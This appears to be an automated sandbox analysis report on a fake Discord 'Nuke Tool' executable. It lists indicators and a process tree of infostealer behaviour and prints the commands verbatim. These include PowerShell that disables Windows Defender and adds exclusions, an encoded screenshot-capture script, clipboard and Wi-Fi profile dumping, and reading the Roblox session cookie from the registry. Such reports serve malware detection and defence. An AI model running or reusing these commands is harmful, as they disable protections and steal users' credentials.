1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1860 wrote to memory of 3752	1860	Nuke Tool discord-gg-kasyno.exe	77
PID 1860 wrote to memory of 3752	1860	Nuke Tool discord-gg-kasyno.exe	77
PID 3752 wrote to memory of 2936	3752	Nuke Tool discord-gg-kasyno.exe	78
PID 3752 wrote to memory of 2936	3752	Nuke Tool discord-gg-kasyno.exe	78
PID 3752 wrote to memory of 4276	3752	Nuke Tool discord-gg-kasyno.exe	79
PID 3752 wrote to memory of 4276	3752	Nuke Tool discord-gg-kasyno.exe	79
PID 2936 wrote to memory of 864	2936	cmd.exe	82
PID 2936 wrote to memory of 864	2936	cmd.exe	82
PID 4276 wrote to memory of 1932	4276	cmd.exe	83
PID 4276 wrote to memory of 1932	4276	cmd.exe	83
PID 3752 wrote to memory of 4820	3752	Nuke Tool discord-gg-kasyno.exe	84
PID 3752 wrote to memory of 4820	3752	Nuke Tool discord-gg-kasyno.exe	84
PID 3752 wrote to memory of 4552	3752	Nuke Tool discord-gg-kasyno.exe	126
PID 3752 wrote to memory of 4552	3752	Nuke Tool discord-gg-kasyno.exe	126
PID 3752 wrote to memory of 2316	3752	Nuke Tool discord-gg-kasyno.exe	86
PID 3752 wrote to memory of 2316	3752	Nuke Tool discord-gg-kasyno.exe	86
PID 4820 wrote to memory of 1864	4820	cmd.exe	90
PID 4820 wrote to memory of 1864	4820	cmd.exe	90
PID 2316 wrote to memory of 4284	2316	cmd.exe	91
PID 2316 wrote to memory of 4284	2316	cmd.exe	91
PID 3752 wrote to memory of 4944	3752	Nuke Tool discord-gg-kasyno.exe	93
PID 3752 wrote to memory of 4944	3752	Nuke Tool discord-gg-kasyno.exe	93
PID 3752 wrote to memory of 900	3752	Nuke Tool discord-gg-kasyno.exe	94
PID 3752 wrote to memory of 900	3752	Nuke Tool discord-gg-kasyno.exe	94
PID 4552 wrote to memory of 4376	4552	cmd.exe	92
PID 4552 wrote to memory of 4376	4552	cmd.exe	92
PID 3752 wrote to memory of 1192	3752	Nuke Tool discord-gg-kasyno.exe	98
PID 3752 wrote to memory of 1192	3752	Nuke Tool discord-gg-kasyno.exe	98
PID 3752 wrote to memory of 4636	3752	Nuke Tool discord-gg-kasyno.exe	99
PID 3752 wrote to memory of 4636	3752	Nuke Tool discord-gg-kasyno.exe	99
PID 3752 wrote to memory of 2168	3752	Nuke Tool discord-gg-kasyno.exe	101
PID 3752 wrote to memory of 2168	3752	Nuke Tool discord-gg-kasyno.exe	101
PID 900 wrote to memory of 2044	900	cmd.exe	103
PID 900 wrote to memory of 2044	900	cmd.exe	103
PID 3752 wrote to memory of 664	3752	Nuke Tool discord-gg-kasyno.exe	105
PID 3752 wrote to memory of 664	3752	Nuke Tool discord-gg-kasyno.exe	105
PID 4944 wrote to memory of 1680	4944	cmd.exe	107
PID 4944 wrote to memory of 1680	4944	cmd.exe	107
PID 3752 wrote to memory of 2560	3752	Nuke Tool discord-gg-kasyno.exe	108
PID 3752 wrote to memory of 2560	3752	Nuke Tool discord-gg-kasyno.exe	108
PID 3752 wrote to memory of 952	3752	Nuke Tool discord-gg-kasyno.exe	109
PID 3752 wrote to memory of 952	3752	Nuke Tool discord-gg-kasyno.exe	109
PID 3752 wrote to memory of 3700	3752	Nuke Tool discord-gg-kasyno.exe	154
PID 3752 wrote to memory of 3700	3752	Nuke Tool discord-gg-kasyno.exe	154
PID 3752 wrote to memory of 1208	3752	Nuke Tool discord-gg-kasyno.exe	112
PID 3752 wrote to memory of 1208	3752	Nuke Tool discord-gg-kasyno.exe	112
PID 1192 wrote to memory of 3804	1192	cmd.exe	117
PID 1192 wrote to memory of 3804	1192	cmd.exe	117
PID 2168 wrote to memory of 3368	2168	cmd.exe	118
PID 2168 wrote to memory of 3368	2168	cmd.exe	118
PID 664 wrote to memory of 2096	664	cmd.exe	119
PID 664 wrote to memory of 2096	664	cmd.exe	119
PID 3700 wrote to memory of 5036	3700	cmd.exe	120
PID 3700 wrote to memory of 5036	3700	cmd.exe	120
PID 4636 wrote to memory of 4772	4636	cmd.exe	121
PID 4636 wrote to memory of 4772	4636	cmd.exe	121
PID 952 wrote to memory of 3140	952	cmd.exe	122
PID 952 wrote to memory of 3140	952	cmd.exe	122
PID 2560 wrote to memory of 2948	2560	cmd.exe	123
PID 2560 wrote to memory of 2948	2560	cmd.exe	123
PID 4376 wrote to memory of 1376	4376	bound.exe	124
PID 4376 wrote to memory of 1376	4376	bound.exe	124
PID 1208 wrote to memory of 2988	1208	cmd.exe	125
PID 1208 wrote to memory of 2988	1208	cmd.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4604	attrib.exe
3576	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe
"C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe
  "C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4376
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1376
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ANY ISSUES? T.ME/SWIEZAK', 0, 'THX FOR USING', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ANY ISSUES? T.ME/SWIEZAK', 0, 'THX FOR USING', 0+16);close()"
      4⤵
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:900
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1192
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:664
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2988
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zbvrpzk2\zbvrpzk2.cmdline"
        5⤵
        
        PID:4640
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8230.tmp" "c:\Users\Admin\AppData\Local\Temp\zbvrpzk2\CSCDEE89D4B78BB4EE885D2CF55C99AEB7C.TMP"
        6⤵
        
        PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4552
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2504
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1700
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:700
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1908
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3144
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:896
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4392
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3700
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4604
- - C:\Windows\system32\cmd.exe
